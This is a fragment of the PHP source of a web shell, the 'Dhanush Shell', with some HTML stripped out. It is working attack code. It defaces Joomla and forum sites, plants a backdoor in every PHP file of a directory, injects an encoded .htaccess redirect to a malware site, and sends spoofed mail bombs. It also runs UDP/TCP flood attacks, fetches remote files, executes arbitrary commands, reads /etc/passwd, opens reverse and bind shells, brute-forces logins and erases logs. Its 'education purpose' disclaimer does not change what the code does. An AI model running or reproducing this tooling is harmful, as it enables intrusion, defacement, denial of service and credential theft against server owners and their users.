curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'

'); if($pos === false) { echo("Cannot Deface Joomla"); } else { echo("Joomla Defaced Successfully"); } } else { $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden=entre2v2($buffer ,'[-] Login Error"); exit; } $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); } $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'

'); if($pos === false) { echo("Cannot Deface Joomla"); exit; } else { echo("Joomla Defaced Successfully"); } } } } else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '') { $filetype = $_POST['filetype']; $mode = "a"; if($_POST['mode'] == 'Apender') $mode = "a"; if($_POST['mode'] == 'Overwriter') $mode = "w"; if (is_dir($_POST['pathtomass'])) { $lolinject = $_POST['injectthis']; $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype; if(substr($_POST['pathtomass'], -1) == "\\") $mypath = $_POST['pathtomass'] . "*.".$filetype; foreach (glob($mypath) as $injectj00) { if($injectj00 == __FILE__) continue; $fp=fopen($injectj00,$mode); if (fputs($fp,$lolinject)) echo '
'.$injectj00.' was injected
'; else echo 'failed to inject '.$injectj00.'
'; } } else echo ''.$_POST['pathtomass'].' is not available!'; } else if(isset($_POST['mailfunction'])) { if($_POST['mailfunction'] == "dobombing") { if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '') { $times = $_POST['times']; while($times--) { if(isset($_POST['padding'])) { $fromPadd = rand(0,9999); $subjectPadd = " -- ID : ".rand(0,9999999); $messagePadd = "\n\n------------------------------\n".rand(0,99999999); } $from = "president$fromPadd@whitehouse.gov"; if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from)) { $error = 1; echo "Some Error Occured!"; break; } } if($error != 1) echo "Mail(s) Sent!"; } } else if($_POST['mailfunction'] == "massmailing") { if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message'])) { if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from'])) echo "Mail Sent!"; else echo "Some Error Occured!"; } } } else if(isset($_POST['code'])) { if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true") { // FIlter Some Chars we dont need ?>
","",$code); // Evaluate PHP CoDE! ?>
Result of execution this PHP-code :
"; foreach (glob($_GET['path'] . "*.php") as $injectj00) { if($injectj00 == __FILE__) continue; if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00) { if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00) { if($myfile=fopen($injectj00,'a')) { fputs($myfile, $str); fclose($myfile); $coun = 1; } } if($coun == 1) echo "Done !!!!"; else echo "Cannot open files !!!!"; } else if(isset($_GET['redirect'])) { if($myfile = fopen(".htaccess",'a')) { $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw"; fwrite($myfile, gzuncompress(base64_decode($mal))); fwrite($myfile, "\n\r"); fclose($myfile); echo "Done !!!!"; } else echo "Cannot open file !!!!"; } else if(isset($_GET['malware'])) { ?> ">

| Infect Users |

| Redirect Search Engine TO Malwared site |

Cannot Open File!!"; } else if(isset($_POST['getcode'])) { if($myfile = fopen(".htaccess",'a')) { fwrite($myfile, $_POST['getcode']); fwrite($myfile, "\n\r"); fclose($myfile); echo "Code Inserted Successfully!!!!"; } else echo "Permission Denied"; } else if(isset($_GET['uploadurl'])) { $functiontype = trim($_GET['functiontype']); $wurl = trim($_GET['wurl']); $path = magicboom($_GET['path']); function remotedownload($cmd,$url) { $namafile = basename($url); switch($cmd) { case 'wwget': execmd(which('wget')." ".$url." -O ".$namafile); break; case 'wlynx': execmd(which('lynx')." -source ".$url." > ".$namafile); break; case 'wfread' : execmd($wurl,$namafile); break; case 'wfetch' : execmd(which('fetch')." -o ".$namafile." -p ".$url); break; case 'wlinks' : execmd(which('links')." -source ".$url." > ".$namafile); break; case 'wget' : execmd(which('GET')." ".$url." > ".$namafile); break; case 'wcurl' : execmd(which('curl')." ".$url." -o ".$namafile); break; default: break; } return $namafile; } $namafile = remotedownload($functiontype,$wurl); $fullpath = $path . $directorysperator . $namafile; if(is_file($fullpath)) { echo "File uploaded to $fullpath"; } else echo "Failed to upload $namafile"; } else if(isset($_GET['createfolder'])) { if(!mkdir($_GET['createfolder'])) echo "Failed To create"; else echo "Folder Created Successfully"; } else if(isset($_GET['selfkill'])) { if(unlink(__FILE__)) echo "
Good Bye......"; else echo "
Shell cannot be removed......"; } else if(isset($_GET['Create'])) { ?> File Created Successfully"; } else echo "Cannot Create File"; } else if(isset($_REQUEST["defaceforum"])) { ?>

Forum Index Changer "; ?>

Forum Password Changer = $maxTime) { break; } } echo "Dos Completed!
"; echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."
"; echo "Total Number of Packets Sent : " . $packets . "
"; echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "
"; echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "
"; } } else if(isset($_GET['fuzzer'])) { if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "") { $IP=$_GET['ip']; $port=$_GET['port']; $times = $_GET['exTime']; $timeout = $_GET['timeout']; $send = 0; $ending = ""; $multiplier = $_GET['multiplier']; $data = ""; $mode="tcp"; $data .= "GET /"; $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r"; if($_GET['type'] == "tcp") { $mode = "tcp"; } while($multiplier--) { $data .= urlencode($_GET['no0fBytes']); } $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers $data .= "by-Dhanush".$ending; $length = strlen($data); echo "Sending Data :-

$data

"; for($i=0;$i<$times;$i++) { $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); if($socket) { fwrite($socket , $data , $length ); fclose($socket); } } echo "Fuzzing Completed!
"; echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
"; echo "Total Number of Packets Sent : " . $times . "
"; echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "
"; echo "Data per packet = " . HumanReadableFilesize($length) . "
"; } } else if(isset($_GET['bypassit'])) { if(isset($_GET['copy'])) { if(@copy($_GET['copy'],"test1.php")) { $fh=fopen("test1.php",'r'); echo "

".htmlspecialchars(@fread($fh,filesize("test1.php")))."

"; @fclose($fh); unlink("test1.php"); } } else if(isset($_GET['imap'])) { $string = $_GET['imap']; echo "

";
		$stream = imap_open($string, "", "");
		$str = imap_body($stream, 1);
		echo "

"; } else if(isset($_GET['sql'])) { echo "

";
		$file=$_GET['sql'];
		
		$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
		$mysql_files = explode(':', $mysql_files_str);
			
		$sql = array (
			"USE $mdb",
				'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
				"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
				. "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
				. "ESCAPED BY          '' "
				. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
				
				"SELECT a FROM $tbl LIMIT 1"
				);
		mysql_connect ($mhost, $muser, $mpass);
				
		foreach ($sql as $statement) {
		   $q = mysql_query ($statement);
		
		   if ($q == false) die (
				  "FAILED: " . $statement . "\n" .
					  "REASON: " . mysql_error () . "\n"
				   );
				
		   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
			
				   echo htmlspecialchars($r[0]);
				   mysql_free_result ($q);
				}
				echo "

"; } else if(isset($_GET['curl'])) { $ch=curl_init("file://" . $_GET[curl]); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

".htmlspecialchars($file_out)."

"; } else if(isset($_GET['include'])) { if(file_exists($_GET['include'])) { echo "

";
			@include($_GET['include']);
			echo "

"; } else echo "
Can't Read" . $_GET['include'] . ""; } else if(isset($_GET['id'])) { echo "

";
		for($uid=0;$uid<60000;$uid++)
		{   //cat /etc/passwd
			$ara = posix_getpwuid($uid);
			if (!empty($ara)) 
			{
				while (list ($key, $val) = each($ara))
				{
					print "$val:";
				}
				print "\n";
			}
		}
		echo "

"; break; } else if(isset($_GET['tempnam'])) { $mytmp = tempnam ( 'tmp', $_GET['tempnam'] ); $fp = fopen ( $mytmp, 'r' ); while(!feof($fp)) echo fgets($fp); fclose ( $fp ); } else if(isset($_GET['symlnk'])) { echo "

";
		@mkdir("mydhanush",0777);
		@chdir("mydhanush");
		execmd("ln -s /etc/passwd");
		
		echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
		echo "

"; } if(isset($_GET['newtype'])) { $filename = $_GET['newtype']; echo "

";
		if($_GET['optiontype'] == "xxd")
			echo execmd("xxd ".$filename);
		else if($_GET['optiontype'] == "rev")
			echo execmd("rev ".$filename);
		if($_GET['optiontype'] == "tac")
			echo execmd("tac ".$filename);
		if($_GET['optiontype'] == "more")
			echo execmd("more ".$filename);
		if($_GET['optiontype'] == "less")
			echo execmd("less ".$filename);
		echo "

"; } } // Deface Website else if(isset($_GET['deface'])) { $myfile = fopen($_GET['deface'],'w'); if(fwrite($myfile, base64_decode($ind))) {fclose($myfile); echo "Index Defaced Successfully";} else echo "Donot have write permission"; } else if(isset($_GET['perms'])) { ?> =0;--$i) $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1)); if(@chmod($_GET['myfilename'],$perms)) echo "File Permissions Changed Successfully"; else echo "Cannot Change File Permissions"; } } else if(isset($_GET['rename'])) { ?> File Renamed Successfully"; } } else if(isset($_GET['open'])) { if(is_file($_GET['myfilepath'])) { $owner = "0/0"; if($os == "Linux") $owner = getOGid($_GET['myfilepath']); ?> File Saved Successfully!"; else echo "Cannot Write into File"; } else { echo "File Name Specified does not exists!"; } } else if(isset($_POST["SendNowToZoneH"])) { $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)) { die("[-] You Must Fill the Attacker name !"); } elseif($method == "--------SELECT--------") { die("[-] You Must Select The Method !"); } elseif($neden == "--------SELECT--------") { die("[-] You Must Select The Reason"); } elseif(empty($site)) { die("[-] You Must Inter the Sites List !"); } // Zone-h Poster function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } $i = 0; $sites = explode("\n", $site); echo "

";
	while($i < count($sites)) 
	{
		if(substr($sites[$i], 0, 4) != "http") 
		{
				$sites[$i] = "http://".$sites[$i];
		}
		ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
		echo "Site : ".$sites[$i]." Posted !
";
		++$i;
	}
		 
	echo "Sending Sites To Zone-H Has Been Completed Successfully !!

"; } else if(isset($_GET['executemycmd'])) { $comm = $_GET['executemycmd']; chdir($_GET['executepath']); echo shell_exec($comm); } // View Passwd file else if(isset($_GET['passwd'])) { $test=''; $tempp= tempnam($test, "cx"); $get = "/etc/passwd"; $name=@posix_getpwuid(@fileowner($get)); $group=@posix_getgrgid(@filegroup($get)); $owner = $name['name']. " / ". $group['name']; ?>

File :		Permissions :
Size :		Owner/Group :

"; unlink($tempp); } else { ?> $get
"; unlink($tempp); } } else if(isset($_GET['bomb'])) { ?>

| Get Domains |

| Symlink Server |

| Symlink File |

| Script Locator |

| Forum Defacer |

| Forum Password Changer |

Server security information

Curl	Oracle	MySQL	MSSQL	PostgreSQL	Open Base Directory	Safe_Exec_Dir	PHP Version	Magic Quotes	Server Admin
						NONE";}else {echo "$df";};} ?>

Directory
Mode
File Type
Create A backdoor by injecting this code in every php file of current directory
<?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?>

Safe mode bypass
Using copy() function	Using imap() function
Using sql() function	Using Curl() function
Bypass using include()	Using id() function
Using tempnam() function	Using symlink() function
Using Bypass function

IP
Port
Timeout
No of times
Message (The message Should be long and it will be multiplied with the value after it)		x

PHP CURL NOT EXIST"; } ?> Zone-h Poster

| Mail Bomber |

| Mass Mailer |

Reverse Shell

Bind Shell

IP
Port
Use:

Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!
Click "Bind", use netcat and give it the command 'nc 9891"!

| Set Your 404 Page |

| Set Specified 404 Page |

D h a n u s h
[--==Coded By Arjun==--]

       -  --  -
       -- -- --
       --    --
       ---  ---
       ------
       ----
   ----             
 ------           
-------          
---   --          
      --      --- 
      --      ----- 
     ---      --- --- 
     ---    ---   ---
--   ---------     --
--    -------      --
 --     ----       --
  --     ---       --
  --     --        --
   ---  ---   --  ---
    ------    ------
     ----      ----
      

		

Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it

GREETZ To All Indian Hackers
| जय महाकाल | | जय हिन्द |

Target :
User names	Password
<?php if($os != "Windows") { if(@file('/etc/passwd')) { $users = file('/etc/passwd'); foreach($users as $user) { $user = explode(':', $user); echo $user[0] . "\n"; } } else { $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } $temp = trim($temp); if($file5 = fopen("test.txt","w")) { fputs($file5,$temp); fclose($file5); $file = fopen("test.txt", "r"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 \|\| strlen($matches) == 0 \|\| $matches == "bin" \|\| $matches == "etc/X11/fs" \|\| $matches == "var/lib/nfs" \|\| $matches == "var/arpwatch" \|\| $matches == "var/gopher" \|\| $matches == "sbin" \|\| $matches == "var/adm" \|\| $matches == "usr/games" \|\| $matches == "var/ftp" \|\| $matches == "etc/ntp" \|\| $matches == "var/www" \|\| $matches == "var/named") continue; echo $matches; } fclose($file); } } } ?>
Guess options : Cpanel(2082) Ftp(21) Telnet(23)
Timeout delay :

| Malware Attack |

| Insert Own Code |

"; ob_start(); eval("phpinfo();"); $b = ob_get_contents(); ob_end_clean(); $a = strpos($b,"")+6; // yeah baby,, your body is wonderland ;-) $z = strpos($b,""); $s_result = "

".substr($b,$a,$z-$a)."

"; echo $s_result; } else if(isset($_GET['execute'])) { $comm = $_GET['execute']; chdir($_GET['executepath']); $check = shell_exec($comm); echo ""; ?>

Logs Cleared

"; } } else { if($openp = fopen("/tmp/logseraser.pl", 'w')) { fwrite($openp, $erase)or die("Error"); fclose($openp); $aidx = passthru("perl logseraser.pl linux"); unlink("logseraser.pl"); echo "Logs Cleared"; } } } else { $check = shell_exec($_GET['mycmd']); echo ""; } } else if(isset($_GET['prototype'])) { echo '

Results

Type: '.htmlspecialchars($_GET['prototype']).'
Server: '.htmlspecialchars($_GET['serverport']).'
'; if( $_GET['prototype'] == 'ftp' ) { function BruteFun($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_GET['prototype'] == 'mysql' ) { function BruteFun($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_GET['prototype'] == 'pgsql' ) { function BruteFun($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_GET['server']); if($_GET['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp)) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_GET['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_GET['type'] == 2) { $temp = @file($_GET['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if(BruteFun($server[0],@$server[1], $_GET['login'], $line) ) { $success++; echo ''.htmlspecialchars($_GET['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } // Execute Query else if(isset($_GET["executeit"])) { if(isset($_GET['username']) && isset($_GET['server'])) { $dbserver = $_GET['server']; $dbuser = $_GET['username']; $dbpass = $_GET['password']; if(mysql_connect($dbserver,$dbuser,$dbpass)) { setcookie("dbserver", $dbserver); setcookie("dbuser", $dbuser); setcookie("dbpass", $dbpass); listdatabase(); } else echo "cannotconnect"; } } else if(isset($_GET['action']) && isset($_GET['dbname'])) { if($_GET['action'] == "createDB") { $dbname = $_GET['dbname']; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); mysql_query("create database $dbname",$mysqlHandle); listdatabase(); } if($_GET['action'] == 'dropDB') { $dbname = $_GET['dbname']; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); mysql_query("drop database $dbname",$mysqlHandle); mysql_close($mysqlHandle); listdatabase(); } if($_GET['action'] == 'listTables') { listtable(); } // Create Tables if($_GET['action'] == "createtable") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("CREATE TABLE $tablename ( no INT )"); listtable(); } // Drop Tables if($_GET['action'] == "dropTable") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("drop table $tablename"); listtable(); } // Empty Tables if($_GET['action'] == "empty") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); mysql_query("delete from $tablename"); listtable(); } // Empty Tables if($_GET['action'] == "dropField") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $fieldname = $_GET['fieldname']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; mysql_select_db( $dbname, $mysqlHandle ); mysql_query( $queryStr , $mysqlHandle ); listtable(); } if($_GET['action'] == 'viewdb') { listdatabase(); } // View Table Schema if($_GET['action'] == "viewSchema") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); echo "

[ $dbname ] - > Database List > Table List [ Log Out ]

"; $pResult = mysql_query( "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); echo "

"; echo ""; for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; $fieldname = $field["Field"]; echo "\n"; echo "\n"; } echo "

Field	Type	Null	Key
".$field["Field"]."	".$field["Type"]."	".$field["Null"]."	".$field["Key"]."	".$field["Default"]."	".$field["Extra"]."	Drop

"; echo "

[ $dbname ] - > Database List > Table List [ Log Out ]

"; } // Execute Query if($_GET['action'] == "executequery") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $result = mysql_query($_GET['executemyquery']); // results echo "\r\n". strtoupper($_GET['executemyquery']) . "
\r\n\r\n"; $count = 0; while ($row = mysql_fetch_assoc($result)) { echo "\r\n"; if ($count==0) // list column names { echo "\r\n"; while($key = key($row)) { echo "\r\n"; next($row); } echo "\r\n"; } foreach($row as $r) // list content of column names { if ($r=='') $r = 'NULL'; echo "\r\n"; } echo "\r\n"; $count++; } echo "

" . $key . "

" . $r . "

\n\r" . $count . " rows returned.\r\n"; echo "

[ $dbname ] - > Database List > Table List [ Log Out ]

"; } // View Table Data if($_GET['action'] == "viewdata") { global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; echo "

[ $dbname ] - > Database List > Table List [ Log Out ]

"; ?>

Data in Table
"; if( $tablename != "" ) echo "$dbname > $tablename
"; else echo "$dbname
"; $queryStr = ""; $pag = 0; $queryStr = stripslashes( $queryStr ); if( $queryStr == "" ) { if(isset($_REQUEST['page'])) { $res = mysql_query("select * from $tablename"); $getres = mysql_num_rows($res); $coun = ceil($getres/30); if($_REQUEST['page'] != 1) $pag = $_REQUEST['page'] * 30; else $pag = $_REQUEST['page'] * 30; $queryStr = "SELECT * FROM $tablename LIMIT $pag,30"; $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30"); $arrcount = 1; $arrdata[$arrcount] = 0; while($row = mysql_fetch_array($sql)) { $arrdata[$arrcount] = $row[$rowid]; $arrcount++; } } else { $queryStr = "SELECT * FROM $tablename LIMIT 0,30"; $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30"); $arrcount = 1; $arrdata[$arrcount] = 0; while($row = mysql_fetch_array($sql)) { $arrdata[$arrcount] = $row[$rowid]; $arrcount++; } } if( $orderby != "" ) $queryStr .= " ORDER BY $orderby"; echo "Schema\n"; } $pResult = mysql_query($queryStr ); $fieldt = mysql_fetch_field($pResult); $tablename = $fieldt->table; $errMsg = mysql_error(); $GLOBALS[queryStr] = $queryStr; if( $pResult == false ) { echoQueryResult(); return; } if( $pResult == 1 ) { $errMsg = "Success"; echoQueryResult(); return; } echo "

\n"; $row = mysql_num_rows( $pResult ); $col = mysql_num_fields( $pResult ); if( $row == 0 ) { echo "No Data Exist!"; return; } if( $rowperpage == "" ) $rowperpage = 30; if( $page == "" ) $page = 0; else $page--; mysql_data_seek( $pResult, $page * $rowperpage ); echo "\n"; echo "\n"; for( $i = 0; $i < $col; $i++ ) { $field = mysql_fetch_field( $pResult, $i ); echo "\n"; } echo "\n"; echo "\n"; $num=1; $acount = 1; for( $i = 0; $i < $rowperpage; $i++ ) { $rowArray = mysql_fetch_row( $pResult ); if( $rowArray == false ) break; echo "\n"; $key = ""; for( $j = 0; $j < $col; $j++ ) { $data = $rowArray[$j]; $field = mysql_fetch_field( $pResult, $j ); if( $field->primary_key == 1 ) $key .= "&" . $field->name . "=" . $data; if( strlen( $data ) > 30 ) $data = substr( $data, 0, 30 ) . "..."; $data = htmlspecialchars( $data ); echo "\n"; } if(!is_numeric($arrdata[$acount])) echo "\n"; else { echo "\n"; echo "\n"; $acount++; } } echo "\n"; echo "

"; if($action == "viewdata") echo "".$field->name."\n"; else echo $field->name."\n"; echo "	Action
\n"; echo "$data\n"; echo "	No Key		Edit	Delete

"; if($arrcount > 30) { $res = mysql_query("select * from $tablename"); $getres = mysql_num_rows($res); $coun = ceil($getres/30); echo ""; echo "

[ $dbname ] - > Database List > Table List [ Log Out ]

"; } } // Delete Table Data if($_GET['action'] == "deleteData") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); $row = mysql_fetch_array($sql); $row = $row['COLUMN_NAME']; $rowid = $_GET[$row]; mysql_query("delete from $tablename where $row = '$rowid'"); listtable(); } // Edit Table Data if($_GET['action'] == "editData") { global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; $tablename = $_GET['tablename']; echo "

